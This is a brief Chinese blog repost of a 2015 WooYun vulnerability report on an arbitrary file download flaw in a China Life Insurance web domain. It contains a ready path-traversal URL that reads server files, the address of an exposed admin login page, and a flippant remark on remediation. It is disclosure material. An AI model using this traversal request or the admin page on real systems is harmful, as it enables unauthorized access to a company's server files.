记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中国人寿任意文件下载

2015-03-28 14:00

code 区域
http://www.e-chinalife.com/cardmisfile/uploadFiles/download.jsp?type=1&PDFnameArr=../../../index.jsp&Onputname=1.jsp





挖出来了个后台,貌似已经不用了

code 区域
http://www.e-chinalife.com/selfcard/mis/manager/login/frmLogin.jsp

漏洞证明:

11.jpg

修复方案:

这种洞一般无影响,但也只是一般,万一呢。。



修复与否无所谓,看厂商心情吧。


知识来源: www.wooyun.org/bugs/wooyun-2015-096712

阅读:101704 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中国人寿任意文件下载”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词